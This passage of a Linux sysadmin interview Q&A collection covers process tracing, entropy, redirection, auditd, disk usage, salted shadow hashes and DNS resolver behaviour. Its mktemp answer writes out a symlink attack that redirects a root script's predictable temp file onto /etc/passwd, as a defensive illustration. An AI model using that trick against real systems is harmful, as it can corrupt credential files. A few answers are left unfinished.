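The answer is left open above; as a starting point, `ps` can report the elapsed time directly and `strace` can show what the process is doing right now (the PID 1234 is an example):

```bash
ps -o pid,etime,cmd -p 1234   # etime = time elapsed since the process started
ls -ld /proc/1234             # the timestamp of /proc/<pid> also hints at the start time
sudo strace -p 1234           # attach and see which system calls it is waiting in
```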
Useful resources:

- [How to check how long a process has been running?](https://unix.stackexchange.com/questions/7870/how-to-check-how-long-a-process-has-been-running)
- [Linux how long a process has been running?](https://www.cyberciti.biz/faq/how-to-check-how-long-a-process-has-been-running/)
- [How to see system call that executed in current time by process?](https://stackoverflow.com/questions/42677724/how-to-see-system-call-that-executed-in-current-time-by-process)

</details>

<details>
<summary><b>What is a file descriptor in Linux?</b></summary><br>

In Unix and related computer operating systems, a file descriptor (FD, less frequently fildes) is an abstract indicator (handle) used to access a file or other input/output resource, such as a pipe or network socket. File descriptors form part of the POSIX application programming interface.

</details>

<details>
<summary><b>Which way of additionally feeding the random entropy pool would you suggest for producing random passwords? How to improve it?</b></summary><br>

You should use `/dev/urandom`, not `/dev/random`. The two differences between `/dev/random` and `/dev/urandom` are:

- `/dev/random` might be theoretically better _in the context of an information-theoretically secure algorithm_. This is the kind of algorithm which is secure against today's technology, and also tomorrow's technology, and technology used by aliens, and God's own iPad as well.
- `/dev/urandom` will not block, while `/dev/random` may do so. `/dev/random` maintains a counter of "how much entropy it still has" under the assumption that any bit it has produced is a lost entropy bit. Blocking induces very real issues, e.g. a server which fails to boot after an automated install because it is stalling on its SSH server key creation.

So you want to use `/dev/urandom` and stop worrying about this entropy business. The trick is that `/dev/urandom` never blocks, ever, even when it should: `/dev/urandom` is secure as long as it has received enough bytes of "initial entropy" since the last boot (32 random bytes are enough). A normal Linux installation will create a random seed (from `/dev/random`) upon installation, and save it on the disk. Upon each reboot, the seed will be read, fed into `/dev/urandom`, and a new seed immediately generated (from `/dev/urandom`) to replace it. Thus, this guarantees that `/dev/urandom` will always have enough initial entropy to produce cryptographically strong randomness, perfectly sufficient for any mundane cryptographic job, including password generation.

Should a daemon require randomness when all available entropy has been exhausted, it may pause to wait for more, which can cause excessive delays in your application. Even worse, since most modern applications will either resort to using their own random seed created at program initialization, or to using `/dev/urandom` to avoid blocking, your applications will suffer from lower quality random data. This can affect the integrity of your secure communications, and can increase the chance of cryptoanalysis on your private data.

To check the amount of bytes of entropy currently available, use:

```bash
cat /proc/sys/kernel/random/entropy_avail
```

**rng-tools**

On Fedora/Rh/Centos types: `sudo yum install rng-tools`. On deb types: `sudo apt-get install rng-tools` to set it up. Then run `sudo rngd -r /dev/urandom` before generating the keys.

**haveged**

On Fedora/Rh/Centos types: `sudo yum install haveged` and add `/usr/local/sbin/haveged -w 1024` to `/etc/rc.local`.
On deb types: `sudo apt-get install haveged` and add `DAEMON_ARGS="-w 1024"` to `/etc/default/haveged` to set it up; the daemon will then keep the entropy pool topped up on its own.

Useful resources:

- [Feeding /dev/random entropy pool? (original)](https://security.stackexchange.com/questions/89/feeding-dev-random-entropy-pool)
- [GPG does not have enough entropy](https://serverfault.com/questions/214605/gpg-does-not-have-enough-entropy)

</details>

<details>
<summary><b>What is the difference between <code>/sbin/nologin</code>, <code>/bin/false</code>, and <code>/bin/true</code>?</b></summary><br>

When `/sbin/nologin` is set as the shell, if a user with that shell logs in, they'll get a polite message saying 'This account is currently not available'.

`/bin/false` is just a binary that immediately exits, returning false, when it's called, so when someone who has false as their shell logs in, they're immediately logged out when false exits. Setting the shell to `/bin/true` has the same effect of not allowing someone to log in, but false is probably used as a convention over true since it's much better at conveying the concept that the person doesn't have a shell.

`/sbin/nologin` is the more user-friendly option, with a customizable message given to the user trying to log in, so you would theoretically want to use that; but both nologin and false will have the same end result of someone not having a shell and not being able to ssh in.

Useful resources:

- [What's the difference between /sbin/nologin and /bin/false](https://unix.stackexchange.com/questions/10852/whats-the-difference-between-sbin-nologin-and-bin-false)
- [Why do some system users have /usr/bin/false as their shell?](https://superuser.com/questions/1183311/why-do-some-system-users-have-usr-bin-false-as-their-shell)

</details>

<details>
<summary><b>Which symptoms might indicate a disk bottleneck? ***</b></summary><br>

To be completed.

</details>

<details>
<summary><b>What is the meaning of the error <code>maxproc limit exceeded by uid %i ...</code> in FreeBSD?</b></summary><br>

The FreeBSD kernel will only allow a certain number of processes to exist at one time. The number is based on the **kern.maxusers** variable. **kern.maxusers** also affects various other in-kernel limits, such as network buffers. If the machine is heavily loaded, increase **kern.maxusers**. This will increase these other system limits in addition to the maximum number of processes.

To adjust the **kern.maxusers** value, see the File/Process Limits section of the Handbook. While that section refers to open files, the same limits apply to processes. If the machine is lightly loaded but running a very large number of processes, adjust the **kern.maxproc** tunable by defining it in `/boot/loader.conf`.

</details>

<details>
<summary><b>How to read a file line by line and assign the value to a variable?</b></summary><br>

For example:

```bash
while IFS='' read -r line || [[ -n "$line" ]] ; do
  echo "Text read from file: $line"
done < "/path/to/filename"
```

Explanation:

- `IFS=''` (or `IFS=`) prevents leading/trailing whitespace from being trimmed.
- `-r` prevents backslash escapes from being interpreted.
- `|| [[ -n $line ]]` prevents the last line from being ignored if it doesn't end with a `\n` (since read returns a non-zero exit code when it encounters EOF).
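A quick way to see why the `|| [[ -n $line ]]` guard matters is to feed the loop a file whose last line has no trailing newline (the file path is an example):

```bash
printf 'first line\nlast line without newline' > /tmp/test.txt
while IFS='' read -r line || [[ -n "$line" ]] ; do
  echo "Text read from file: $line"
done < /tmp/test.txt
# Prints both lines; without the guard, the last one would be silently skipped.
```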
Useful resources:

- [Read a file line by line assigning the value to a variable](https://stackoverflow.com/questions/10929453/read-a-file-line-by-line-assigning-the-value-to-a-variable)

</details>

<details>
<summary><b>The client reports that his site received a grade B in the ssllabs scanner. Prepare a checklist of best practices for ssl configuration. ***</b></summary><br>

Useful resources:

- [Getting a Perfect SSL Labs Score](https://michael.lustfield.net/nginx/getting-a-perfect-ssl-labs-score)
- [17 small suggestions how to improve ssllabs.com/ssltest/](https://community.qualys.com/thread/14023)
- [How do you score A+ with 100 on all categories on SSL Labs test with Let's Encrypt and Nginx?](https://stackoverflow.com/questions/41930060/how-do-you-score-a-with-100-on-all-categories-on-ssl-labs-test-with-lets-encry)

</details>

<details>
<summary><b>What do CPU jumps mean?</b></summary><br>

An OS is a very busy thing, particularly so when you have it doing something (and even when you aren't). And when we are looking at an active enterprise environment, something is always going on. Most of this activity is "bursty", meaning processes are typically quiescent with short periods of intense activity. This is certainly true of any type of network-based activity (e.g. processing PHP requests), but also applies to OS maintenance (e.g. file system maintenance, page reclamation, disk I/O requests).

If you take a situation where you have a lot of such bursty processes, you get a very irregular and spiky CPU usage plot. As the user `500 - Internal Server Error` notes in the original thread, a high number of context switches is going to make the situation even worse.

Useful resources:

- [What does "CPU jumps" mean? (original)](https://stackoverflow.com/questions/32185607/what-does-cpu-jumps-mean)

</details>

<details>
<summary><b>How do you trace a system call in Linux? Explain the possible methods.</b></summary><br>

**SystemTap**

This is the most powerful method. It can even show the call arguments.

Usage:

```bash
sudo apt-get install systemtap
sudo stap -e 'probe syscall.mkdir { printf("%s[%d] -> %s(%s)\n", execname(), pid(), name, argstr) }'
```

Then on another terminal:

```bash
sudo rm -rf /tmp/a /tmp/b
mkdir /tmp/a
mkdir /tmp/b
```

Sample output:

```bash
mkdir[4590] -> mkdir("/tmp/a", 0777)
mkdir[4593] -> mkdir("/tmp/b", 0777)
```

**`strace` with `-f|-ff` params**

You can use the `-f` and `-ff` options. Something like this:

```bash
strace -f -e trace=process bash -c 'ls; :'
```

- `-f` : Trace child processes as they are created by currently traced processes as a result of the fork(2) system call.
- `-ff` : If the `-o` filename option is in effect, each process's trace is written to filename.pid where pid is the numeric process id of each process. This is incompatible with `-c`, since no per-process counts are kept.

**`ltrace -S` shows both system calls and library calls**

This awesome tool therefore gives even further visibility into what executables are doing.

**`ftrace` minimal runnable example**

Here goes a minimal runnable example. Run with `sudo`:

```bash
#!/bin/sh
set -eux
d=debug/tracing

mkdir -p debug
if ! mountpoint -q debug; then
  mount -t debugfs nodev debug
fi

# Stop tracing.
echo 0 > "${d}/tracing_on"

# Clear previous traces.
echo > "${d}/trace"

# Find the tracer name.
cat "${d}/available_tracers"

# Disable tracing functions, show only system call events.
echo nop > "${d}/current_tracer"

# Find the event name with.
grep mkdir "${d}/available_events"

# Enable tracing mkdir.
# Both statements below seem to do the exact same thing,
# just with different interfaces.
# https://www.kernel.org/static/html/v4.18/trace/events.html
echo sys_enter_mkdir > "${d}/set_event"
# echo 1 > "${d}/events/syscalls/sys_enter_mkdir/enable"

# Start tracing.
echo 1 > "${d}/tracing_on"

# Generate two mkdir calls by two different processes.
rm -rf /tmp/a /tmp/b
mkdir /tmp/a
mkdir /tmp/b

# View the trace.
cat "${d}/trace"

# Stop tracing.
echo 0 > "${d}/tracing_on"
umount debug
```

Sample output:

```bash
# tracer: nop
#
#                              _-----=> irqs-off
#                             / _----=> need-resched
#                            | / _---=> hardirq/softirq
#                            || / _--=> preempt-depth
#                            ||| /     delay
#           TASK-PID   CPU#  ||||    TIMESTAMP  FUNCTION
#              | |       |   ||||       |         |
           mkdir-5619  [005] .... 10249.262531: sys_mkdir(pathname: 7fff93cbfcb0, mode: 1ff)
           mkdir-5620  [003] .... 10249.264613: sys_mkdir(pathname: 7ffcdc91ecb0, mode: 1ff)
```

One cool thing about this method is that it shows the function call for all processes on the system at once, although you can also filter PIDs of interest with `set_ftrace_pid`.

Useful resources:

- [How do I trace a system call in Linux? (original)](https://stackoverflow.com/questions/29840213/how-do-i-trace-a-system-call-in-linux)
- [Does ftrace allow capture of system call arguments to the Linux kernel, or only function names?](https://stackoverflow.com/questions/27608752/does-ftrace-allow-capture-of-system-call-arguments-to-the-linux-kernel-or-only)
- [How to trace just system call events with ftrace without showing any other functions in the Linux kernel?](https://stackoverflow.com/questions/52764544/how-to-trace-just-system-call-events-with-ftrace-without-showing-any-other-funct)
- [What system call is used to load libraries in Linux?](https://unix.stackexchange.com/questions/226524/what-system-call-is-used-to-load-libraries-in-linux)

</details>

<details>
<summary><b>How to remove all files except some from a directory?</b></summary><br>

Solution 1 - with `extglob`:

```bash
shopt -s extglob
rm !(textfile.txt|backup.tar.gz|script.php|database.sql|info.txt)
```

Solution 2 - with `find`:

```bash
find . -type f -not -name '*txt' -print0 | xargs -0 rm --
```

</details>

<details>
<summary><b>How to check if a string contains a substring in Bash?</b></summary><br>

You can use `*` (wildcards) outside a case statement, too, if you use double brackets:

```bash
string='My long string'
if [[ $string = *"My long"* ]] ; then
  true
fi
```

</details>

<details>
<summary><b>Explain differences between <code>2>&-</code>, <code>2>/dev/null</code>, <code>|&</code>, <code>&>/dev/null</code>, and <code>>/dev/null 2>&1</code>.</b></summary><br>

- a **number 1** = standard out (i.e. `STDOUT`)
- a **number 2** = standard error (i.e. `STDERR`)
- if a number isn't explicitly given, then **number 1** is assumed by the shell (bash)

First let's tackle the function of these.

`2>&-`

The general form of this one is `M>&-`, where **"M"** is a file descriptor number. This will close output for whichever file descriptor is referenced, i.e. **"M"**.

`2>/dev/null`

The general form of this one is `M>/dev/null`, where **"M"** is a file descriptor number. This will redirect the file descriptor, **"M"**, to `/dev/null`.

`2>&1`

The general form of this one is `M>&N`, where **"M"** & **"N"** are file descriptor numbers. It combines the output of file descriptors **"M"** and **"N"** into a single stream.

`|&`

This is just an abbreviation for `2>&1 |`. It was added in Bash 4.
`&>/dev/null`

This is just an abbreviation for `>/dev/null 2>&1`. It redirects file descriptor 2 (`STDERR`) and descriptor 1 (`STDOUT`) to `/dev/null`.

`>/dev/null`

This is just an abbreviation for `1>/dev/null`. It redirects file descriptor 1 (`STDOUT`) to `/dev/null`.

Useful resources:

- [Difference between 2>&-, 2>/dev/null, |&, &>/dev/null and >/dev/null 2>&1](https://unix.stackexchange.com/questions/70963/difference-between-2-2-dev-null-dev-null-and-dev-null-21)
- [Chapter 20. I/O Redirection](http://www.tldp.org/LDP/abs/html/io-redirection.html)

</details>

<details>
<summary><b>How to redirect stderr and stdout to different files in the same line?</b></summary><br>

Just add them in one line: `command 2>> error 1>> output`.

However, note that `>>` appends if the file already has data, whereas `>` will overwrite any existing data in the file. So, use `command 2> error 1> output` if you do not want to append.

Just for completion's sake, you can write `1>` as just `>`, since 1 is the default file descriptor for output; `1>` and `>` are the same thing. So, `command 2> error 1> output` becomes `command 2> error > output`.

</details>

<details>
<summary><b>Load averages are above 30 on a server with 24 cores but the CPU shows around 70 percent idle. What is one of the common causes of this condition? How do you debug and fix it?</b></summary><br>

Requests which involve disk I/O can be slowed greatly if the CPU(s) need to wait on the disk to read or write data. I/O wait is the percentage of time the CPU has to wait on disk. Let's look at how we can confirm whether disk I/O is slowing down application performance by using a few terminal command line tools (`top`, `atop` and `iotop`).

Example of debugging:

- answering whether or not I/O is causing system slowness
- finding which disk is being written to
- finding the processes that are causing high I/O - process list **state**
- finding what files are being written to too heavily
- do you see your copy process put in **D** state waiting for I/O work to be done by pdflush?
- do you see heavy synchronous write activity on your disks?

also:

- using the `top` command - load averages and wa (wait time)
- using the `atop` command to monitor DSK (disk) I/O stats
- using the `iotop` command for real-time insight on disk reads/writes

To improve performance:

- check the drive array configuration
- check disk queuing algorithms and tune them
- tune general block I/O parameters
- tune virtual memory management to improve I/O performance
- check and tune mount options and filesystem params (also responsible for cache)

Useful resources:

- [Linux server performance: Is disk I/O slowing your application? (original)](https://haydenjames.io/linux-server-performance-disk-io-slowing-application/)
- [Troubleshooting High I/O Wait in Linux](https://bencane.com/2012/08/06/troubleshooting-high-io-wait-in-linux/)
- [Debugging Linux I/O latency](https://superuser.com/questions/396696/debugging-linux-i-o-latency)
- [How do pdflush, kjournald, swapd, etc interoperate?](https://unix.stackexchange.com/questions/76970/how-do-pdflush-kjournald-swapd-etc-interoperate)
- [5 ways to improve HDD speed on Linux](https://thecodeartist.blogspot.com/2012/06/improving-hdd-performance-linux.html)

</details>

<details>
<summary><b>How to enforce authentication methods in SSH?
In what situations would it be useful?</b></summary><br>

Force login with a password:

```bash
ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no user@remote_host
```

Force login using the key:

```bash
ssh -o PreferredAuthentications=publickey -o PubkeyAuthentication=yes -i id_rsa user@remote_host
```

Useful resources:

- [How to force ssh client to use only password auth?](https://unix.stackexchange.com/questions/15138/how-to-force-ssh-client-to-use-only-password-auth)

</details>

<details>
<summary><b>Getting <code>Too many Open files</code> error for Postgres. How to resolve it?</b></summary><br>

The issue was fixed by reducing `max_files_per_process`, e.g. to 200 from the default 1000. This parameter lives in the `postgresql.conf` file and sets the maximum number of simultaneously open files allowed to each server subprocess.

Usually people start by editing the `/etc/security/limits.conf` file, but forget that this file only applies to users actively logged in through the PAM system.

</details>

<details>
<summary><b>In what circumstance can <code>df</code> and <code>du</code> disagree on available disk space? How do you solve it?</b></summary><br>

`du` walks directories and sums up file sizes, while `df` reports block usage for the filesystem as a whole - and files can be held open and take up space after they're deleted, in which case only `df` still counts them.

**Solution 1**

Check for files located under mount points. Frequently, if you mount a directory (say a sambafs) onto a filesystem that already had a file or directories under it, you lose the ability to see those files, but they're still consuming space on the underlying disk. I've had file copies in single-user mode dump files into directories that I couldn't see except in single-user mode (due to other directory systems being mounted on top of them).

**Solution 2**

On the other hand, `df -h` and `du -sh` can disagree by about 50% of the hard disk size. This can be caused by e.g. Apache (httpd) keeping log files open which had already been deleted from disk. This was tracked down by running `lsof | grep "/var" | grep deleted`, where `/var` was the partition I needed to clean up. The output showed lines like this:

```
httpd     32617    nobody  106w      REG        9,4 1835222944     688166 /var/log/apache/awstats_log (deleted)
```

The situation was then resolved by restarting Apache (`service httpd restart`), which released the locks on the deleted files and cleared the disk space.

Useful resources:

- [Why du and df display different values in Linux and Unix](https://linuxshellaccount.blogspot.com/2008/12/why-du-and-df-display-different-values.html)

</details>

<details>
<summary><b>What is the difference between encryption and hashing?</b></summary><br>

**Hashing** is a form of cryptographic security which differs from **encryption**: whereas **encryption** is a two-step process used to first encrypt and then decrypt a message, **hashing** condenses a message into an irreversible fixed-length value, or hash.

</details>

<details>
<summary><b>Should the root certificate go on the server?</b></summary><br>

**Self-signed root certificates** need not/should not be included in web server configuration. They serve no purpose (clients will always ignore them) and they incur a slight performance (latency) penalty because they increase the size of the SSL handshake.

If the client does not have the root in their trust store, then it won't trust the web site, and there is no way to work around that problem.
Having the web server send the root certificate will not help - the root certificate has to come from a trusted third party (in most cases the browser vendor).

Useful resources:

- [SSL root certificate optional?](https://security.stackexchange.com/questions/65332/ssl-root-certificate-optional)

</details>

<details>
<summary><b>How to log all commands run by root on production servers?</b></summary><br>

`auditd` is the correct tool for the job here:

1. Add these 2 lines to `/etc/audit/audit.rules`:

```bash
-a exit,always -F arch=b64 -F euid=0 -S execve
-a exit,always -F arch=b32 -F euid=0 -S execve
```

These will track all commands run by root (euid=0). Why two rules? The execve syscall must be tracked in both 32 and 64 bit code.

2. To get rid of `auid=4294967295` messages in logs, add `audit=1` to the kernel's cmdline (by editing `/etc/default/grub`).

3. Place the line

```bash
session required pam_loginuid.so
```

in all PAM config files that are relevant to login (`/etc/pam.d/{login,kdm,sshd}`), but not in the files that are relevant to su or sudo. This will allow auditd to get the calling user's uid correctly when calling sudo or su.

Restart your system now. Let's login and run some commands:

```bash
$ id -u
1000
$ sudo ls /
bin  boot  data  dev  etc  home  initrd.img  initrd.img.old  lib  lib32  lib64
lost+found  media  mnt  opt  proc  root  run  sbin  scratch  selinux  srv  sys
tmp  usr  var  vmlinuz  vmlinuz.old
$ sudo su -
# ls /etc
[...]
```

Now read `/var/log/audit/audit.log` to see what has been logged.

Useful resources:

- [Log all commands run by admins on production servers](https://serverfault.com/questions/470755/log-all-commands-run-by-admins-on-production-servers)

</details>

<details>
<summary><b>How to prevent <code>dd</code> from freezing your system?</b></summary><br>

Try using ionice:

```bash
ionice -c3 dd if=/dev/zero of=file
```

This starts the `dd` process with the "idle" I/O priority: it only gets disk time when no other process is using disk I/O for a certain amount of time. Of course this can still flood the buffer cache and cause freezes while the system flushes out the cache to disk. There are tunables under `/proc/sys/vm/` to influence this, particularly the `dirty_*` entries.

</details>

<details>
<summary><b>How to limit processes to not exceed more than X% of CPU usage?</b></summary><br>

**nice/renice**

nice is a great tool for 'one off' tweaks to a system:

```bash
nice COMMAND
```

**cpulimit**

cpulimit if you need to run a CPU intensive job and having free CPU time is essential for the responsiveness of a system:

```bash
cpulimit -l 50 COMMAND
```

**cgroups**

cgroups apply limits to a set of processes, rather than to just one:

```bash
cgcreate -g cpu:/cpulimited
cgset -r cpu.shares=512 cpulimited
cgexec -g cpu:cpulimited COMMAND_1
cgexec -g cpu:cpulimited COMMAND_2
cgexec -g cpu:cpulimited COMMAND_3
```

</details>

<details>
<summary><b>How to mount a temporary ram partition?</b></summary><br>

```bash
# -t - filesystem type
# -o - mount options
mount -t tmpfs tmpfs /mnt -o size=64M
```

</details>

<details>
<summary><b>How to kill a process that is locking a file?</b></summary><br>

```bash
fuser -k filename
```

</details>

<details>
<summary><b>Another admin, trying to debug a server, accidentally typed: <code>chmod -x /bin/chmod</code>.
How to reset permissions back to default?</b></summary><br>

```bash
# 1: copy the *contents* of chmod over an already-executable file
#    (cp preserves the destination's permissions), then use the copy:
cp /bin/ls chmod.01
cp /bin/chmod chmod.01
./chmod.01 0700 /bin/chmod

# 2: use the chmod applet built into busybox:
/bin/busybox chmod 0700 /bin/chmod

# 3: set the permissions through the ACL tools instead of chmod:
setfacl --set u::rwx,g::---,o::--- /bin/chmod

# 4: run chmod through the dynamic loader, which doesn't require
#    the executable bit to be set on the binary:
/usr/lib/ld*.so /bin/chmod 0700 /bin/chmod
```

Useful resources:

- [What can you do when you can't chmod chmod?](https://www.networkworld.com/article/3002286/operating-systems/what-can-you-do-when-you-cant-chmod-chmod.html)

</details>

<details>
<summary><b><code>grub></code> vs <code>grub-rescue></code>. Explain.</b></summary><br>

- `grub>` - the mode GRUB enters when it has found everything it needs to run the system, including its configuration file. In this mode we have access to most (if not all) modules and commands. It can also be called from the menu by pressing the 'c' key
- `grub-rescue>` - the mode GRUB falls back to when it cannot find its own directory (especially the directory with modules and additional commands, e.g. `/boot/grub/i386-pc`), when its contents are damaged, or when no normal module can be found; it contains only basic commands

</details>

<details>
<summary><b>How to check whether the private key and the certificate match?</b></summary><br>

```bash
(openssl rsa -noout -modulus -in private.key | openssl md5 ; openssl x509 -noout -modulus -in certificate.crt | openssl md5) | uniq
```

</details>

<details>
<summary><b>How to add a new user without using the <code>useradd</code>/<code>adduser</code> commands?</b></summary><br>

1. Add an entry with the user's details to <code>/etc/passwd</code> with `vipw`:

```bash
# username:password:UID:GID:Comments:Home_Directory:Login Shell
user:x:501:501:test user:/home/user:/bin/bash
```

> Be careful with the syntax. Do not edit directly with an editor. `vipw` locks the file, so that other commands won't try to update it at the same time.

2. You will have to create a group with the same name in <code>/etc/group</code> with `vigr` (a similar tool to `vipw`):

```bash
user:x:501:
```

3. Assign a password to the user:

```bash
passwd user
```

4. Create the home directory of the user with mkdir:

```bash
mkdir -m 0700 /home/user
```

5. Copy the files from `/etc/skel` to the new home directory:

```bash
rsync -av --delete /etc/skel/ /home/user
```

6. Fix ownerships and permissions with `chown` and `chmod`:

```bash
chown -R user:user /home/user
chmod -R go-rwx /home/user
```

Useful resources:

- [What steps to add a user to a system without using useradd/adduser?](https://unix.stackexchange.com/questions/153225/what-steps-to-add-a-user-to-a-system-without-using-useradd-adduser)

</details>

<details>
<summary><b>Why do we need the <code>mktemp</code> command? Present an example of use.</b></summary><br>

<code>mktemp</code> randomizes the name. It is very important from the security point of view.

Just imagine that you do something like:

```bash
echo "random_string" > /tmp/temp-file
```

in your root-running script. And someone (who has read your script) does

```bash
ln -s /etc/passwd /tmp/temp-file
```

The <code>mktemp</code> command could help you in this situation:

```bash
TEMP=$(mktemp /tmp/temp-file.XXXXXXXX)
echo "random_string" > ${TEMP}
```

Now this <code>ln -s /etc/passwd</code> attack will not work.

</details>

<details>
<summary><b>Is it safe to attach <code>strace</code> to a running process in production? What are the consequences?</b></summary><br>

`strace` is the system call tracer for Linux.
It currently uses the arcane `ptrace()` (process trace) debugging interface, which operates in a violent manner: **pausing the target process** for each syscall so that the debugger can read state. And it does this twice: when the syscall begins, and when it ends.

This means `strace` pauses your application twice for each syscall, and context-switches each time between the application and `strace`. It's like putting traffic metering lights on your application.

Cons:

- can cause significant and sometimes massive performance overhead, in the worst case slowing the target application by over 100x. This may not only make it unsuitable for production use, but any timing information may also be so distorted as to be misleading
- can't trace multiple processes simultaneously (with the exception of followed children)
- visibility is limited to the system call interface

Useful resources:

- [strace Wow Much Syscall (original)](http://www.brendangregg.com/blog/2014-05-11/strace-wow-much-syscall.html)

</details>

<details>
<summary><b>What is the easiest, safest and most portable way to remove a <code>-fr</code> directory entry?</b></summary><br>

These are effective but not optimally portable:

- <code>rm -- -fr</code>
- <code>perl -le 'unlink("-fr");'</code>

People who go on about shell command line quoting and character escaping are almost as dangerous as those who simply don't even recognize why a file name like that poses any problem at all.

The most portable solution:

```bash
rm ./-fr
```

</details>

<details>
<summary><b>Write a simple bash script (or pair of scripts) to backup and restore your system. ***</b></summary><br>

To be completed.

</details>

<details>
<summary><b>What are salted hashes? Generate the password with salt for the <code>/etc/shadow</code> file.</b></summary><br>

**Salt** at its most fundamental level is random data. When a properly protected password system receives a new password, it will create a hashed value for that password, create a new random salt value, and then store that combined value in its database. This helps defend against dictionary attacks and known hash attacks.

For example, if a user uses the same password on two different systems and they use the same hashing algorithm, they could end up with the same hash value. However, if even one of the systems uses salt with its hashes, the values will be different.

The encrypted passwords in the `/etc/shadow` file are stored in the following format:

```bash
$ID$SALT$ENCRYPTED
```

The `$ID` indicates the type of encryption, the `$SALT` is a random (up to 16 characters) string and `$ENCRYPTED` is the password's hash.
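For instance, a made-up (and truncated) SHA-512 line for a user `test` would decompose as ID `6`, salt `EqRlO6F2`, the hash, and then the standard password-aging fields:

```bash
# $ID = 6 (SHA-512), $SALT = EqRlO6F2, $ENCRYPTED = the hash (truncated here)
test:$6$EqRlO6F2$kN1c...Xq1:18009:0:99999:7:::
```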
<table style="width:100%">
  <tr>
    <th>Hash Type</th>
    <th>ID</th>
    <th>Hash Length</th>
  </tr>
  <tr>
    <td>MD5</td>
    <td>$1</td>
    <td>22 characters</td>
  </tr>
  <tr>
    <td>SHA-256</td>
    <td>$5</td>
    <td>43 characters</td>
  </tr>
  <tr>
    <td>SHA-512</td>
    <td>$6</td>
    <td>86 characters</td>
  </tr>
</table>

Use the commands below from the Linux shell to generate a hashed password for `/etc/shadow` with a random salt (the snippets use Python 2's `crypt` module):

- Generate an **MD5** password hash:

```bash
python -c "import random,string,crypt; randomsalt = ''.join(random.sample(string.ascii_letters,8)); print crypt.crypt('MySecretPassword', '\$1\$%s\$' % randomsalt)"
```

- Generate a **SHA-256** password hash:

```bash
python -c "import random,string,crypt; randomsalt = ''.join(random.sample(string.ascii_letters,8)); print crypt.crypt('MySecretPassword', '\$5\$%s\$' % randomsalt)"
```

- Generate a **SHA-512** password hash:

```bash
python -c "import random,string,crypt; randomsalt = ''.join(random.sample(string.ascii_letters,8)); print crypt.crypt('MySecretPassword', '\$6\$%s\$' % randomsalt)"
```

</details>

###### Network Questions (27)

<details>
<summary><b>Create SPF records for your site to help control spam. ***</b></summary><br>

To be completed.

</details>

<details>
<summary><b>What is the difference between an authoritative and a nonauthoritative answer to a DNS query? ***</b></summary><br>

An authoritative DNS query answer comes from the server that contains the zone files for the domain queried. This is the name server that the domain administrator set up the DNS records on.

A nonauthoritative answer comes from a name server that does not host the domain zone files (for example, a commonly used name server has the answer cached, such as Google's 8.8.8.8 or OpenDNS 208.67.222.222).

</details>

<details>
<summary><b>If you try to resolve a hostname you get <code>NXDOMAIN</code> from the <code>host</code> command. Your <code>resolv.conf</code> lists two nameservers, but only the second of them can resolve this domain name. Why didn't the local resolver check the second nameserver?</b></summary><br>

**NXDOMAIN** is nothing but a non-existent Internet or intranet domain name. If a domain name cannot be resolved using DNS, an **NXDOMAIN** condition occurs.

The default behavior of `resolv.conf` and the `resolver` is to try the servers in the order listed. The resolver will only try the next nameserver if the first nameserver times out. The algorithm used is to try a name server, and if the query times out, try the next, until out of name servers, then repeat trying all the name servers until a maximum number of retries is made. An **NXDOMAIN** reply is a valid answer, not a failure, so the resolver stops there. Likewise, if a nameserver responds with **SERVFAIL** or a referral, only the first DNS server will be used.

Example:

```
nameserver 192.168.250.20 # it's not a dns
nameserver 8.8.8.8        # does not store gate.test.int
nameserver 127.0.0.1      # stores gate.test.int
```

so if you check:

```
host -v -t a gate.test.int
Trying "gate.test.int"
# tries the first dns (192.168.250.20) but the response times out, so the next nameserver is tried
Host gate.test.int not found: 3(NXDOMAIN)
# 8.8.8.8 answers, but the response is NXDOMAIN (this domain name was not found)
Received 88 bytes from 8.8.8.8#53 in 43 ms
Received 88 bytes from 8.8.8.8#53 in 43 ms
# so the last server in the list was never asked
```

To avoid this you can use e.g. the `nslookup` command, which will use the second nameserver if it receives a **SERVFAIL** from the first nameserver.
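For example (reusing the hypothetical names from the `resolv.conf` above), you can also point `nslookup` or `dig` at one specific server, which is a quick way to confirm which nameserver actually holds the record:

```bash
# Ask the 127.0.0.1 resolver directly, bypassing the resolv.conf order
nslookup gate.test.int 127.0.0.1

# The same check with dig
dig @127.0.0.1 gate.test.int +short
```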
Useful resources:

- [Second nameserver in /etc/resolv.conf not picked up by wget](https://serverfault.com/questions/398837/second-nameserver-in-etc-resolv-conf-not-picked-up-by-wget)

</details>

<details>
<summary><b>Explore the current MTA configuration at your site. What are some of the special features of the MTA that are in use? ***</b></summary><br>

To be completed.

</details>

<details>
<summary><b>How to find a domain based on the IP address? What techniques/tools can you use? ***</b></summary><br>

To be completed.

</details>

<details>
<summary><b>Is it possible to have an SSL certificate for an IP address, not a domain name?</b></summary><br>

It is possible (but rarely used) as long as it is a public IP address.

An SSL certificate is typically issued to a Fully Qualified Domain Name (FQDN) such as `https://www.domain.com`. However, some organizations need an SSL certificate issued to a public IP address. This option allows you to specify a public IP address as the Common Name in your Certificate Signing Request (CSR). The issued certificate can then be used to secure connections directly with the public IP address (e.g. `https://1.1.1.1`).

According to the CA Browser forum, there may be compatibility issues with certificates for IP addresses unless the IP address is in both the commonName and subjectAltName fields. This is due to legacy SSL implementations which are not aligned with RFC 5280, notably Windows OS prior to Windows 10.

Useful resources:

- [Are SSL certificates bound to the servers ip address?](https://stackoverflow.com/questions/1095780/are-ssl-certificates-bound-to-the-servers-ip-address)
- [SSL certificate for a public IP address?](https://serverfault.com/questions/193775/ssl-certificate-for-a-public-ip-address)

</details>

<details>
<summary><b>How do you do load testing and capacity planning for websites? ***</b></summary><br>

To be completed.

Useful resources:

- [How do you do load testing and capacity planning for web sites? (original)](https://serverfault.com/questions/350454/how-do-you-do-load-testing-and-capacity-planning-for-web-sites)
- [Can you help me with my capacity planning?](https://serverfault.com/questions/384686/can-you-help-me-with-my-capacity-planning)
- [How do you do load testing and capacity planning for databases?](https://serverfault.com/questions/350458/how-do-you-do-load-testing-and-capacity-planning-for-databases)

</details>

<details>
<summary><b>Developer reports a problem with connectivity to the remote service. Use <code>/dev</code> for troubleshooting.</b></summary><br>

```bash
# <host> - the remote host
# <port> - the destination port

# 1: the exit code tells you whether the TCP connection succeeded
timeout 1 bash -c "</dev/tcp/<host>/<port>" >/dev/null 2>&1 ; echo $?

# 2: the same check, spelled out with cat
timeout 1 bash -c 'cat < /dev/null > /dev/tcp/<host>/<port>' ; echo $?

# 3: the shortest form (errors out if the port is closed)
echo > /dev/tcp/<host>/<port>
```

Useful resources:

- [Advanced Bash-Scripting Guide - /dev](http://www.tldp.org/LDP/abs/html/devref1.html#DEVTCP)
